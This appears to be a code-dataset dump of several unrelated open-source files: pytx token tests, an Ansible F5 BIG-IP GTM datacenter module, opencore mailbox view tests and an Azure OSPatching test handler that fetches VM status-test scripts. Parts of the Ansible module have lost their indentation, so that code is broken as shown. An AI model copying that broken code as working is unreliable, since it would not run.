        expected_token = 'app_id|app_secret'
        file_contents = 'app_id|app_secret'
        with patch('pytx.access_token._find_token_file', return_value='/foobar/mocked/away'), \
                patch('pytx.access_token._read_token_file', return_value=file_contents):
            access_token.init(token_file='/foobar/mocked/away')
        self.verify_token(expected_token)

    def test_explicit_token_file(self):
        # Token file passed explicitly even though discovery finds nothing.
        expected_token = 'app_id|app_secret'
        file_contents = 'app_id|app_secret'
        with patch('pytx.access_token._find_token_file', return_value=None), \
                patch('pytx.access_token._read_token_file', return_value=file_contents):
            access_token.init(token_file='/foobar/mocked/away')
        self.verify_token(expected_token)

    def test_single_env_var(self, monkeypatch):
        # The complete token can come from one environment variable.
        expected_token = 'app_id|app_secret'
        monkeypatch.setenv(te.TX_ACCESS_TOKEN, expected_token)
        access_token.init()
        self.verify_token(expected_token)

    def test_double_env_var(self, monkeypatch):
        # ...or be assembled from separate app id / secret variables.
        expected_token = 'app_id|app_secret'
        monkeypatch.setenv(te.TX_APP_ID, 'app_id')
        monkeypatch.setenv(te.TX_APP_SECRET, 'app_secret')
        access_token.init()
        self.verify_token(expected_token)
| bsd-3-clause |
ATIX-AG/ansible | lib/ansible/modules/network/f5/bigip_gtm_datacenter.py | 27 | 13431 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright (c) 2017 F5 Networks Inc.
# GNU General Public License v3.0 (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = r'''
---
module: bigip_gtm_datacenter
short_description: Manage Datacenter configuration in BIG-IP
description:
- Manage BIG-IP data center configuration. A data center defines the location
where the physical network components reside, such as the server and link
objects that share the same subnet on the network. This module is able to
manipulate the data center definitions in a BIG-IP.
version_added: "2.2"
options:
contact:
description:
- The name of the contact for the data center.
description:
description:
- The description of the data center.
location:
description:
- The location of the data center.
name:
description:
- The name of the data center.
required: True
state:
description:
- The datacenter state. If C(absent), an attempt to delete the
data center will be made. This will only succeed if the
data center is not in use by any servers or links. C(present) creates
the data center and enables it. If C(enabled), enable the data
center if it exists. If C(disabled), create the data center if
needed, and set state to C(disabled).
default: present
choices:
- present
- absent
- enabled
- disabled
partition:
description:
- Device partition to manage resources on.
default: Common
version_added: 2.5
extends_documentation_fragment: f5
author:
- Tim Rupp (@caphrim007)
'''
EXAMPLES = r'''
- name: Create data center "New York"
bigip_gtm_datacenter:
server: lb.mydomain.com
user: admin
password: secret
name: New York
location: 222 West 23rd
delegate_to: localhost
'''
RETURN = r'''
contact:
description: The contact that was set on the datacenter.
returned: changed
type: string
sample: admin@root.local
description:
description: The description that was set for the datacenter.
returned: changed
type: string
sample: Datacenter in NYC
enabled:
description: Whether the datacenter is enabled or not
returned: changed
type: bool
sample: true
disabled:
description: Whether the datacenter is disabled or not.
returned: changed
type: bool
sample: true
state:
description: State of the datacenter.
returned: changed
type: string
sample: disabled
location:
description: The location that is set for the datacenter.
returned: changed
type: string
sample: 222 West 23rd
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.basic import env_fallback
HAS_DEVEL_IMPORTS = False
try:
# Sideband repository used for dev
from library.module_utils.network.f5.bigip import HAS_F5SDK
from library.module_utils.network.f5.bigip import F5Client
from library.module_utils.network.f5.common import F5ModuleError
from library.module_utils.network.f5.common import AnsibleF5Parameters
from library.module_utils.network.f5.common import cleanup_tokens
from library.module_utils.network.f5.common import fqdn_name
from library.module_utils.network.f5.common import f5_argument_spec
try:
from library.module_utils.network.f5.common import iControlUnexpectedHTTPError
except ImportError:
HAS_F5SDK = False
HAS_DEVEL_IMPORTS = True
except ImportError:
# Upstream Ansible
from ansible.module_utils.network.f5.bigip import HAS_F5SDK
from ansible.module_utils.network.f5.bigip import F5Client
from ansible.module_utils.network.f5.common import F5ModuleError
from ansible.module_utils.network.f5.common import AnsibleF5Parameters
from ansible.module_utils.network.f5.common import cleanup_tokens
from ansible.module_utils.network.f5.common import fqdn_name
from ansible.module_utils.network.f5.common import f5_argument_spec
try:
from ansible.module_utils.network.f5.common import iControlUnexpectedHTTPError
except ImportError:
HAS_F5SDK = False
class Parameters(AnsibleF5Parameters):
    """Shared parameter handling for the GTM datacenter module."""

    # No API-name -> module-name translations are needed for this module.
    api_map = {}

    # Attributes that can be changed on an existing datacenter.
    updatables = [
        'location', 'description', 'contact', 'state'
    ]

    # Attributes reported back to the user on change.
    returnables = [
        'location', 'description', 'contact', 'state', 'enabled', 'disabled'
    ]

    # Attributes sent to the device REST API.
    api_attributes = [
        'enabled', 'location', 'description', 'contact', 'disabled'
    ]

    def to_return(self):
        """Collect every returnable attribute, dropping unset entries."""
        result = {name: getattr(self, name) for name in self.returnables}
        return self._filter_params(result)

    def api_params(self):
        """Build the kwargs dict sent to the device, honoring api_map."""
        result = {}
        for attr in self.api_attributes:
            source = self.api_map[attr] if attr in self.api_map else attr
            result[attr] = getattr(self, source)
        return self._filter_params(result)
class ApiParameters(Parameters):
    """Parameters as read back from the BIG-IP REST API."""

    @property
    def disabled(self):
        # Only an explicit True is meaningful; anything else reads as unset.
        return True if self._values['disabled'] is True else None

    @property
    def enabled(self):
        return True if self._values['enabled'] is True else None
class ModuleParameters(Parameters):
    """Parameters as supplied by the user in the task definition."""

    @property
    def disabled(self):
        if self._values['state'] == 'disabled':
            return True
        return None

    @property
    def enabled(self):
        return True if self._values['state'] in ('enabled', 'present') else None

    @property
    def state(self):
        # 'present' passes through unchanged; otherwise normalize to the
        # explicit enabled/disabled form derived above.
        state = self._values['state']
        if state == 'present':
            return state
        if self.enabled:
            return 'enabled'
        if self.disabled:
            return 'disabled'
        return state
class Changes(Parameters):
    def to_return(self):
        """Report every returnable attribute of the change set.

        Unlike Parameters.to_return, this deliberately swallows any error so
        a partially-populated change set still reports whatever could be
        computed rather than failing the whole module run.
        """
        result = {}
        try:
            for returnable in self.returnables:
                result[returnable] = getattr(self, returnable)
            result = self._filter_params(result)
        except Exception:
            # Intentional broad catch: best-effort reporting only.
            pass
        return result
class UsableChanges(Changes):
    # Changes in the form pushed to the device API; no extra massaging needed.
    pass
class ReportableChanges(Changes):
    """Changes reshaped for reporting back to the user: the enabled/disabled
    booleans are derived from the final state value."""

    @property
    def disabled(self):
        state = self._values['state']
        if state == 'disabled':
            return True
        if state in ('enabled', 'present'):
            return False
        return None

    @property
    def enabled(self):
        state = self._values['state']
        if state in ('enabled', 'present'):
            return True
        if state == 'disabled':
            return False
        return None
class Difference(object):
    """Computes, per parameter, the value that must change on the device.

    ``compare`` first looks for a property on this class with the parameter's
    name (a custom diff rule, e.g. ``state``); otherwise it falls back to a
    plain want-vs-have comparison, returning the wanted value when the two
    differ and None when they agree.
    """

    def __init__(self, want, have=None):
        self.want = want
        self.have = have

    def compare(self, param):
        try:
            return getattr(self, param)
        except AttributeError:
            return self.__default(param)

    def __default(self, param):
        wanted = getattr(self.want, param)
        try:
            if wanted != getattr(self.have, param):
                return wanted
        except AttributeError:
            # 'have' lacks the attribute entirely: the wanted value wins.
            return wanted

    @property
    def state(self):
        # enabled/disabled are folded into 'state', so diff them explicitly
        # and carry the matching flag alongside the state value.
        if self.want.enabled != self.have.enabled:
            return dict(state=self.want.state, enabled=self.want.enabled)
        if self.want.disabled != self.have.disabled:
            return dict(state=self.want.state, disabled=self.want.disabled)
class ModuleManager(object):
    """Orchestrates the desired-state workflow: read current device config,
    diff it against the requested parameters, and create/update/remove the
    datacenter accordingly."""

    def __init__(self, *args, **kwargs):
        self.module = kwargs.pop('module', None)
        self.client = kwargs.pop('client', None)
        # want = user-requested config; have = current device config
        # (populated lazily); changes = accumulated diff to apply/report.
        self.want = ModuleParameters(params=self.module.params)
        self.have = ApiParameters()
        self.changes = UsableChanges()

    def exec_module(self):
        """Entry point: dispatch on the desired state and build the result dict."""
        changed = False
        result = dict()
        state = self.want.state
        try:
            if state in ['present', 'enabled', 'disabled']:
                changed = self.present()
            elif state == "absent":
                changed = self.absent()
        except iControlUnexpectedHTTPError as e:
            # Normalize REST transport errors into the module's error type.
            raise F5ModuleError(str(e))
        reportable = ReportableChanges(params=self.changes.to_return())
        changes = reportable.to_return()
        result.update(**changes)
        result.update(dict(changed=changed))
        self._announce_deprecations(result)
        return result

    def _announce_deprecations(self, result):
        # Surface any queued deprecation warnings via Ansible's mechanism.
        warnings = result.pop('__warnings', [])
        for warning in warnings:
            self.module.deprecate(
                msg=warning['msg'],
                version=warning['version']
            )

    def _update_changed_options(self):
        # Diff each updatable attribute; dict-valued diffs (e.g. 'state')
        # are merged flat into the change set.
        diff = Difference(self.want, self.have)
        updatables = Parameters.updatables
        changed = dict()
        for k in updatables:
            change = diff.compare(k)
            if change is None:
                continue
            else:
                if isinstance(change, dict):
                    changed.update(change)
                else:
                    changed[k] = change
        if changed:
            self.changes = UsableChanges(params=changed)
            return True
        return False

    def should_update(self):
        """Return True when any updatable attribute differs from the device."""
        result = self._update_changed_options()
        if result:
            return True
        return False

    def present(self):
        if self.exists():
            return self.update()
        else:
            return self.create()

    def absent(self):
        changed = False
        if self.exists():
            changed = self.remove()
        return changed

    def read_current_from_device(self):
        """Load the datacenter's current attributes from the device."""
        resource = self.client.api.tm.gtm.datacenters.datacenter.load(
            name=self.want.name,
            partition=self.want.partition
        )
        result = resource.attrs
        return ApiParameters(params=result)

    def exists(self):
        result = self.client.api.tm.gtm.datacenters.datacenter.exists(
            name=self.want.name,
            partition=self.want.partition
        )
        return result

    def update(self):
        self.have = self.read_current_from_device()
        if not self.should_update():
            return False
        if self.module.check_mode:
            # Check mode: report the pending change without touching the device.
            return True
        self.update_on_device()
        return True

    def update_on_device(self):
        params = self.want.api_params()
        resource = self.client.api.tm.gtm.datacenters.datacenter.load(
            name=self.want.name,
            partition=self.want.partition
        )
        resource.modify(**params)

    def create(self):
        self.have = ApiParameters()
        # Populate self.changes even though everything is "new".
        self.should_update()
        if self.module.check_mode:
            return True
        self.create_on_device()
        if self.exists():
            return True
        else:
            raise F5ModuleError("Failed to create the datacenter")

    def create_on_device(self):
        params = self.want.api_params()
        self.client.api.tm.gtm.datacenters.datacenter.create(
            name=self.want.name,
            partition=self.want.partition,
            **params
        )

    def remove(self):
        if self.module.check_mode:
            return True
        self.remove_from_device()
        # Verify the delete actually took effect on the device.
        if self.exists():
            raise F5ModuleError("Failed to delete the datacenter")
        return True

    def remove_from_device(self):
        resource = self.client.api.tm.gtm.datacenters.datacenter.load(
            name=self.want.name,
            partition=self.want.partition
        )
        resource.delete()
class ArgumentSpec(object):
    """Builds the AnsibleModule argument specification for this module."""

    def __init__(self):
        self.supports_check_mode = True
        # Module-specific arguments, layered on top of the shared F5 spec.
        own_args = dict(
            contact=dict(),
            description=dict(),
            location=dict(),
            name=dict(required=True),
            state=dict(
                default='present',
                choices=['present', 'absent', 'disabled', 'enabled']
            ),
            partition=dict(
                default='Common',
                fallback=(env_fallback, ['F5_PARTITION'])
            )
        )
        spec = {}
        spec.update(f5_argument_spec)
        spec.update(own_args)
        self.argument_spec = spec
def main():
    """Module entry point: build the spec, run the manager, report results."""
    spec = ArgumentSpec()
    module = AnsibleModule(
        argument_spec=spec.argument_spec,
        supports_check_mode=spec.supports_check_mode
    )
    if not HAS_F5SDK:
        module.fail_json(msg="The python f5-sdk module is required")

    # BUGFIX: client must exist before the try block. If F5Client(...) itself
    # raised, the previous except handler called cleanup_tokens(client) on an
    # unbound name, masking the real error with a NameError.
    client = None
    try:
        client = F5Client(**module.params)
        mm = ModuleManager(module=module, client=client)
        results = mm.exec_module()
        cleanup_tokens(client)
        module.exit_json(**results)
    except F5ModuleError as ex:
        if client is not None:
            cleanup_tokens(client)
        module.fail_json(msg=str(ex))
if __name__ == '__main__':
main()
| gpl-3.0 |
damilare/opencore | opencore/views/tests/test_mbox.py | 4 | 12472 | # Copyright (C) 2008-2009 Open Society Institute
# Thomas Moroz: tmoroz.org
# 2010-2011 Large Blue
# Fergus Doyle: fergus.doyle@largeblue.com
#
# This program is free software; you can redistribute it and/or modify it
# under the terms of the GNU General Public License Version 2 as published
# by the Free Software Foundation. You may not use, modify or distribute
# this program under any other version of the GNU General Public License.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
# stdlib
from datetime import datetime
import unittest, uuid
from urllib import urlencode
# Zope
import transaction
# webob
from webob import Response
from webob.multidict import MultiDict
# Repoze
from repoze.bfg.testing import (
DummyModel,
DummyRequest,
cleanUp,
registerUtility,
)
from repoze.folder import Folder
# testfixtures
from testfixtures import LogCapture
from testfixtures import Replacer
# simplejson
from simplejson import JSONDecoder
# opencore
from opencore.models.adapters import ProfileDict
from opencore.models.interfaces import IProfileDict
from opencore.scripting import get_default_config
from opencore.scripting import open_root
from opencore.utilities.mbox import MailboxTool
from opencore.utilities.mbox import MboxMessage
from opencore.utilities.mbox import NoSuchThreadException
from opencore.utilities.tests.test_mbox import get_data
from opencore.utils import find_profiles
from opencore.views.api import get_template_api
from opencore.views.mbox import _format_date
from opencore.views.mbox import _get_mbox_type
from opencore.views.mbox import _json_response
from opencore.views.mbox import DEFAULT_MBOX_TYPE
from opencore.views.mbox import PER_PAGE
from opencore.views.mbox import add_message
from opencore.views.mbox import delete_message
from opencore.views.mbox import mark_message_read
from opencore.views.mbox import show_mbox
from opencore.views.mbox import show_mbox_thread
from opencore.testing import (
DummyUsers,
DummyProfile,
)
from opencore.views.tests import (
DummyAPI,
)
def _authenticated_user_id(request):
    # Test stand-in for the authenticated_userid lookup patched into
    # opencore.views.mbox: every request is treated as user 'admin'.
    return 'admin'
class MBoxViewTestCase(unittest.TestCase):
    """Exercises the opencore mbox (messaging) views end-to-end against a
    dummy site, patching out authentication and profile lookups."""

    def setUp(self):
        self.mbt = MailboxTool()
        self.log = LogCapture()
        self.context = DummyModel()
        self.context['mailboxes'] = DummyModel()
        self.context.users = DummyUsers()
        self.bob = DummyProfile()
        self.bob.__name__ = 'bob'
        self.alice = DummyProfile()
        self.alice.__name__ = 'alice'

    def tearDown(self):
        # Tear down the bfg testing registry between tests.
        cleanUp()

    def _get_mbox_request(self, mbox_type, key='mbox_type'):
        # Build a request carrying the given mbox type under the given key.
        request = DummyRequest()
        request.params[key] = mbox_type
        return request

    def test_per_page(self):
        self.assertEquals(PER_PAGE, 20)

    def test_json_response(self):
        success = uuid.uuid4().hex
        error_msg = uuid.uuid4().hex
        response = _json_response(success, error_msg)
        self.assertTrue(isinstance(response, Response))
        self.assertEquals(response.content_type, 'application/x-json')
        given_body = sorted(JSONDecoder().decode(response.body).items())
        expected_body = [('error_msg', error_msg), ('success', success)]
        self.assertEquals(given_body, expected_body)

    def test_get_mbox_type(self):
        mbox_type = _get_mbox_type(self._get_mbox_request('inbox'))
        self.assertEquals(mbox_type, 'inbox')
        mbox_type = _get_mbox_type(self._get_mbox_request('sent'))
        self.assertEquals(mbox_type, 'sent')
        # Unrecognized mbox type, should revert to default inbox.
        mbox_type = _get_mbox_type(self._get_mbox_request(uuid.uuid4().hex))
        self.assertEquals(mbox_type, DEFAULT_MBOX_TYPE)
        # Unrecognized key, should revert to default inbox.
        mbox_type = _get_mbox_type(self._get_mbox_request('inbox', key=uuid.uuid4().hex))
        self.assertEquals(mbox_type, DEFAULT_MBOX_TYPE)

    def test_show_mbox(self):
        _people_url = uuid.uuid4().hex
        _firstname = uuid.uuid4().hex
        _lastname = uuid.uuid4().hex
        _country = uuid.uuid4().hex

        class _DummyAPI(object):
            # Minimal stand-in for the template API used by the view.
            static_url = '/foo/bar'
            def find_profile(*ignored_args, **ignored_kwargs):
                class _Dummy(object):
                    firstname = _firstname
                    lastname = _lastname
                    country = _country
                    organization = uuid.uuid4().hex
                    thumb_url = lambda _profile, _request: '/test-thumb.jpg'
                return _Dummy()
            people_url = _people_url

        with Replacer() as r:
            r.replace('opencore.views.mbox.authenticated_userid', _authenticated_user_id)
            r.replace('opencore.views.mbox._get_profile_details',
                      lambda context, request, user: {})
            site, from_, _, msg, thread_id, _, _, _, payload, _ = get_data()
            to = find_profiles(site)['admin']
            self.mbt.send_message(site, from_, to, msg, should_commit=True)
            site, _ = open_root(get_default_config())
            request = DummyRequest()
            request.params['thread_id'] = thread_id
            request.api = _DummyAPI()
            response = show_mbox_thread(site, request)
            self.assertTrue(isinstance(response['api'], _DummyAPI))
            # NOTE(review): assertTrue with two args is a no-op assertion;
            # assertEquals was probably intended here.
            self.assertTrue(len(response['messages']), 1)
            message = response['messages'][0]
            flags = message['flags']
            if flags:
                self.assertEquals(flags, ['READ'])
            self.assertEquals(message['from'], 'admin')
            self.assertEquals(message['from_country'], _country)
            self.assertEquals(message['from_firstname'], _firstname)
            self.assertEquals(message['from_lastname'], _lastname)
            self.assertEquals(message['from_photo'], '/test-thumb.jpg')
            self.assertEquals(message['payload'], payload)
            self.assertTrue(len(message['payload']) > 20)
            self.assertTrue(len(message['queue_id']) > 20)
            self.assertTrue(len(message['to_data']) == 2)
            to_data = message['to_data']
            for to_datum in to_data:
                self.assertEquals(to_datum['country'], _country)
                self.assertEquals(to_datum['firstname'], _firstname)
                self.assertEquals(to_datum['lastname'], _lastname)
                name = to_datum['name']
                self.assertTrue(name in ('joe', 'sarah'))
                self.assertEquals(to_datum['photo_url'], '/test-thumb.jpg')

    def test_add_message(self):
        subject = uuid.uuid4().hex
        payload = uuid.uuid4().hex
        site, _ = open_root(get_default_config())
        to = find_profiles(site)['sarah']
        with Replacer() as r:
            r.replace('opencore.views.mbox.authenticated_userid', _authenticated_user_id)
            r.replace('opencore.views.mbox._get_profile_details',
                      lambda context, request, user: {})
            request = DummyRequest(method='POST')
            request.api = DummyAPI()
            request.api.find_profile = (lambda userid:
                self.bob if userid == 'bob' else self.alice)
            request.POST = MultiDict([
                ('to[]', 'bob'),
                ('subject', subject),
                ('payload', payload),
            ])
            response = add_message(site, request)
            # A successful post redirects to the new thread.
            self.assertTrue("mbox_thread" in response.location)
            transaction.commit()

    def test_add_message_multiple_recipients(self):
        subject = uuid.uuid4().hex
        payload = uuid.uuid4().hex
        with Replacer() as r:
            r.replace('opencore.views.mbox.authenticated_userid', _authenticated_user_id)
            r.replace('opencore.views.mbox._get_profile_details',
                      lambda context, request, user: {})
            request = DummyRequest(method='POST')
            request.POST = MultiDict([
                ('to[]', 'bob'),
                ('to[]', 'alice'),
                ('subject', subject),
                ('payload', payload),
            ])
            request.api = DummyAPI()
            request.api.find_profile = (lambda userid:
                self.bob if userid == 'bob' else self.alice)
            response = add_message(self.context, request)
            # Mailboxes have been created
            self.assertTrue('bob.inbox' in self.context['mailboxes'])
            self.assertTrue('alice.inbox' in self.context['mailboxes'])
            # Queues have been created
            bob_inbox = self.context['mailboxes']['bob.inbox']
            alice_inbox = self.context['mailboxes']['alice.inbox']
            self.assertEquals(len(bob_inbox), 1)
            self.assertEquals(len(alice_inbox), 1)
            # Redirect to new message
            self.assertEquals(
                'http://example.com/mbox_thread.html?'
                + urlencode({'thread_id': alice_inbox[0].id})
                + '#last-message',
                response.location)
            # NOTE(review): redundant under `with Replacer()` — the context
            # manager already restores on exit.
            r.restore()
            transaction.commit()

    def test_delete_message(self):
        api = uuid.uuid4().hex
        with Replacer() as r:
            r.replace('opencore.views.mbox.authenticated_userid', _authenticated_user_id)
            site, from_, _, msg, thread_id, msg_id, _, _, _, _ = get_data()
            to = find_profiles(site)['admin']
            self.mbt.send_message(site, from_, to, msg, should_commit=True)
            request = DummyRequest()
            request.api = api
            request.params['thread_id'] = thread_id
            request.params['message_id'] = msg_id
            delete_message(site, request)
            transaction.commit()
            # After deletion the thread must be gone entirely.
            try:
                raw_msg, msg = self.mbt.get_message(site, from_, 'inbox', thread_id, msg_id)
            except NoSuchThreadException:
                pass
            else:
                raise Exception('Expected a NoSuchThreadException here')

    def test_mark_message_read(self):
        api = uuid.uuid4().hex
        with Replacer() as r:
            r.replace('opencore.views.mbox.authenticated_userid', _authenticated_user_id)
            site, from_, _, msg, thread_id, msg_id, _, _, _, _ = get_data()
            to = find_profiles(site)['admin']
            self.mbt.send_message(site, from_, to, msg, should_commit=True)
            request = DummyRequest()
            request.api = api
            request.params['thread_id'] = thread_id
            request.params['message_id'] = msg_id
            mark_message_read(site, request)
            transaction.commit()
            raw_msg, msg = self.mbt.get_message(site, from_, 'inbox', thread_id, msg_id)
            self.assertEquals(raw_msg.flags, ['READ'])

    def test_get_unread(self):
        api = uuid.uuid4().hex
        user_name = 'admin'
        with Replacer() as r:
            r.replace('opencore.views.mbox.authenticated_userid', _authenticated_user_id)
            site, from_, _, msg, thread_id, msg_id, _, _, _, _ = get_data()
            to = find_profiles(site)[user_name]
            self.mbt.send_message(site, from_, to, msg, should_commit=True)
            request = DummyRequest()
            request.api = api
            request.params['thread_id'] = thread_id
            request.params['message_id'] = msg_id
            mark_message_read(site, request)
            transaction.commit()
            # Send a second (unread) message, then count unread ones.
            self.mbt.send_message(site, from_, to, msg, should_commit=True)
            transaction.commit()
            unread = self.mbt.get_unread(site, user_name)
            self.assertTrue(unread >= 0)

    def test_format_date(self):
        orig = '2011-05-31 13:59:50'
        expected = '31 May at 13:59'
        site, from_, _, msg, thread_id, msg_id, _, _, _, _ = get_data()
        given = _format_date(site, orig)
        self.assertEquals(expected, given)
| gpl-2.0 |
krkhan/azure-linux-extensions | OSPatching/test/test_handler_3.py | 8 | 22200 | #!/usr/bin/python
#
# OSPatching extension
#
# Copyright 2014 Microsoft Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import sys
import re
import time
import chardet
import tempfile
import urllib2
import urlparse
import shutil
import traceback
import logging
from azure.storage import BlobService
from Utils.WAAgentUtil import waagent
import Utils.HandlerUtil as Util
import json
import unittest
from patch import *
from FakePatching3 import FakePatching
sys.path.append('..')
# Global variables definition
ExtensionShortName = 'OSPatching'
DownloadDirectory = 'download'
idleTestScriptName = "idleTest.py"
healthyTestScriptName = "healthyTest.py"
handlerName = os.path.basename(sys.argv[0])
status_file = './status/0.status'
log_file = './extension.log'
settings_file = "default.settings"

# Load the fixture settings once at import time; every handler function
# below reads this module-level dict.
with open(settings_file, "r") as f:
    settings_string = f.read()
settings = json.loads(settings_string)
def install():
    """Handler for the extension 'install' operation; reports via do_exit."""
    hutil.do_parse_context('Install')
    try:
        MyPatching.install()
        hutil.do_exit(0, 'Install', 'success', '0', 'Install Succeeded.')
    except Exception as e:
        hutil.log_and_syslog(logging.ERROR, "Failed to install the extension with error: %s, stack trace: %s" %(str(e), traceback.format_exc()))
        hutil.do_exit(1, 'Install', 'error', '0', 'Install Failed.')
def enable():
    """Handler for 'enable': apply settings, stage VM status-test scripts and
    start (or schedule) patching."""
    hutil.do_parse_context('Enable')
    try:
        MyPatching.parse_settings(settings)
        # Ensure the same configuration is executed only once
        hutil.exit_if_seq_smaller()
        oneoff = settings.get("oneoff")
        download_customized_vmstatustest()
        copy_vmstatustestscript(hutil.get_seq_no(), oneoff)
        MyPatching.enable()
        current_config = MyPatching.get_current_config()
        hutil.do_exit(0, 'Enable', 'success', '0', 'Enable Succeeded. Current Configuration: ' + current_config)
    except Exception as e:
        current_config = MyPatching.get_current_config()
        hutil.log_and_syslog(logging.ERROR, "Failed to enable the extension with error: %s, stack trace: %s" %(str(e), traceback.format_exc()))
        hutil.do_exit(1, 'Enable', 'error', '0', 'Enable Failed. Current Configuation: ' + current_config)
def uninstall():
    """Handler for 'uninstall': nothing to clean up, report success."""
    hutil.do_parse_context('Uninstall')
    hutil.do_exit(0, 'Uninstall', 'success', '0', 'Uninstall Succeeded.')
def disable():
    """Handler for 'disable': stop any scheduled patching."""
    hutil.do_parse_context('Disable')
    try:
        # Ensure the same configuration is executed only once
        hutil.exit_if_seq_smaller()
        MyPatching.disable()
        hutil.do_exit(0, 'Disable', 'success', '0', 'Disable Succeeded.')
    except Exception as e:
        hutil.log_and_syslog(logging.ERROR, "Failed to disable the extension with error: %s, stack trace: %s" %(str(e), traceback.format_exc()))
        hutil.do_exit(1, 'Disable', 'error', '0', 'Disable Failed.')
def update():
    """Handler for 'update': nothing version-specific to migrate, report success."""
    # BUGFIX: the context label was misspelled 'Upadate'.
    hutil.do_parse_context('Update')
    hutil.do_exit(0, 'Update', 'success', '0', 'Update Succeeded.')
def download():
    """Handler for the 'download' sub-operation: fetch pending updates only.

    Note: status is reported under the 'Enable' operation name because the
    Azure extension model only tracks top-level operations.
    """
    hutil.do_parse_context('Download')
    try:
        MyPatching.parse_settings(settings)
        MyPatching.download()
        current_config = MyPatching.get_current_config()
        hutil.do_exit(0,'Enable','success','0', 'Download Succeeded. Current Configuation: ' + current_config)
    except Exception as e:
        current_config = MyPatching.get_current_config()
        hutil.log_and_syslog(logging.ERROR, "Failed to download updates with error: %s, stack trace: %s" %(str(e), traceback.format_exc()))
        hutil.do_exit(1, 'Enable','error','0', 'Download Failed. Current Configuation: ' + current_config)
def patch():
    """Handler for the 'patch' sub-operation: install downloaded updates.

    Status is reported under 'Enable' (see download()).
    """
    hutil.do_parse_context('Patch')
    try:
        MyPatching.parse_settings(settings)
        MyPatching.patch()
        current_config = MyPatching.get_current_config()
        hutil.do_exit(0,'Enable','success','0', 'Patch Succeeded. Current Configuation: ' + current_config)
    except Exception as e:
        current_config = MyPatching.get_current_config()
        hutil.log_and_syslog(logging.ERROR, "Failed to patch with error: %s, stack trace: %s" %(str(e), traceback.format_exc()))
        hutil.do_exit(1, 'Enable','error','0', 'Patch Failed. Current Configuation: ' + current_config)
def oneoff():
    """Handle the 'oneoff' operation: run a single unscheduled patch pass."""
    hutil.do_parse_context('Oneoff')
    try:
        MyPatching.parse_settings(settings)
        MyPatching.patch_one_off()
        hutil.do_exit(0, 'Enable', 'success', '0',
                      'Oneoff Patch Succeeded. Current Configuation: ' + MyPatching.get_current_config())
    except Exception as exc:
        hutil.log_and_syslog(
            logging.ERROR,
            "Failed to one-off patch with error: %s, stack trace: %s" % (str(exc), traceback.format_exc()))
        hutil.do_exit(1, 'Enable', 'error', '0',
                      'Oneoff Patch Failed. Current Configuation: ' + MyPatching.get_current_config())
def download_files(hutil):
    """Fetch the configured VMStatusTest scripts into this sequence's download dir.

    The 'vmStatusTest' section of the global *settings* supplies either inline
    script content ('local' == "true") or URIs. Remote scripts come from Azure
    storage when account credentials are present, otherwise from the external
    links. Every saved script is normalized via preprocess_files().
    """
    local = settings.get("vmStatusTest", dict()).get("local", "")
    if local.lower() == "true":
        local = True
    elif local.lower() == "false":
        local = False
    else:
        hutil.log_and_syslog(logging.WARNING, "The parameter \"local\" "
            "is empty or invalid. Set it as False. Continue...")
        local = False
    idle_test_script = settings.get("vmStatusTest", dict()).get('idleTestScript')
    healthy_test_script = settings.get("vmStatusTest", dict()).get('healthyTestScript')
    # Validate that the supplied script sources match the declared 'local' mode:
    # inline scripts must not be URIs, remote scripts must be URIs.
    if (not idle_test_script and not healthy_test_script):
        hutil.log_and_syslog(logging.WARNING, "The parameter \"idleTestScript\" and \"healthyTestScript\" "
            "are both empty. Exit downloading VMStatusTest scripts...")
        return
    elif local:
        if (idle_test_script and idle_test_script.startswith("http")) or \
                (healthy_test_script and healthy_test_script.startswith("http")):
            hutil.log_and_syslog(logging.WARNING, "The parameter \"idleTestScript\" or \"healthyTestScript\" "
                "should not be uri. Exit downloading VMStatusTest scripts...")
            return
    elif not local:
        if (idle_test_script and not idle_test_script.startswith("http")) or \
                (healthy_test_script and not healthy_test_script.startswith("http")):
            hutil.log_and_syslog(logging.WARNING, "The parameter \"idleTestScript\" or \"healthyTestScript\" "
                "should be uri. Exit downloading VMStatusTest scripts...")
            return
    hutil.do_status_report('Downloading','transitioning', '0',
                'Downloading VMStatusTest scripts...')
    # NOTE(review): this dict is keyed by the script source (content or uri) —
    # if both settings carry identical values the dict collapses to a single
    # entry and only one destination file is written; confirm that is intended.
    vmStatusTestScripts = dict()
    vmStatusTestScripts[idle_test_script] = idleTestScriptName
    vmStatusTestScripts[healthy_test_script] = healthyTestScriptName
    if local:
        hutil.log_and_syslog(logging.INFO, "Saving VMStatusTest scripts from user's configurations...")
        for src,dst in vmStatusTestScripts.items():
            if not src:
                continue
            file_path = save_local_file(src, dst, hutil)
            preprocess_files(file_path, hutil)
        return
    storage_account_name = None
    storage_account_key = None
    if settings:
        storage_account_name = settings.get("storageAccountName", "").strip()
        storage_account_key = settings.get("storageAccountKey", "").strip()
    if storage_account_name and storage_account_key:
        hutil.log_and_syslog(logging.INFO, "Downloading VMStatusTest scripts from azure storage...")
        for src,dst in vmStatusTestScripts.items():
            if not src:
                continue
            file_path = download_blob(storage_account_name,
                                      storage_account_key,
                                      src,
                                      dst,
                                      hutil)
            preprocess_files(file_path, hutil)
    elif not(storage_account_name or storage_account_key):
        hutil.log_and_syslog(logging.INFO, "No azure storage account and key specified in protected "
            "settings. Downloading VMStatusTest scripts from external links...")
        for src,dst in vmStatusTestScripts.items():
            if not src:
                continue
            file_path = download_external_file(src, dst, hutil)
            preprocess_files(file_path, hutil)
    else:
        #Storage account and key should appear in pairs
        error_msg = "Azure storage account or storage key is not provided"
        hutil.log_and_syslog(logging.ERROR, error_msg)
